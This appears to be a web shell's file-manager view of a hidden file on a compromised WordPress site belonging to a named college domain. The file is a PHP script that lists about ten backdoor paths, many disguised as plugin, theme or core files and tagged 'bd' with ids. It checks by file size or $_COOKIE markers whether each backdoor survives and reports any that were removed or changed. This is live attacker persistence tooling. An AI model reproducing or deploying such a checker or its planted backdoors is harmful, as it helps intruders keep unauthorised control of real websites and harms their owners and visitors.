HEX
Server: Apache
System: Linux WWW 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64
User: web11 (1011)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /var/www/itt.kaunokolegija.lt/wp-includes/rest-api/endpoints/.mb_convert
<?php   $r = '/var/www/itt.kaunokolegija.lt'; $x = ["//wp-includes/rest-api/endpoints/class-wp-rest-font-collections-controller.php"=>"bd@@3859@@$_COOKIE[6",
"/wp-content/plugins/ocean-extra/includes/freemius/templates/plugin-info/index.php"=>"bd@@3871@@$_COOKIE[-",
"/wp-content/plugins/wp-file-manager/lib/php/editors/editor.php"=>"bd@@3878@@48",
"/wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-message.php"=>"bd@@3887@@$_COOKIE[7",
"/wp-content/plugins/elementor/vendor_prefixed/twig/src/Node/Expression/Filter/email_forgot.php"=>"bd@@3892@@534",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/Token/formtext.php"=>"bd@@3893@@1523",
"/wp-content/plugins/ocean-extra/includes/panel/classes/importers/parsers/class.owp.parser.xml.php"=>"bd@@3895@@1043",
"/wp-content/plugins/wp-console/lib/php-7.4/vendor/symfony/polyfill-intl-grapheme/abspath.php"=>"bd@@3900@@1483",
"/.tmb/preform.php"=>"bd@@3771@@534",
"/wp-content/themes/twentytwentyone/template-parts/content/content-page.php"=>"bd@@3832@@43"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');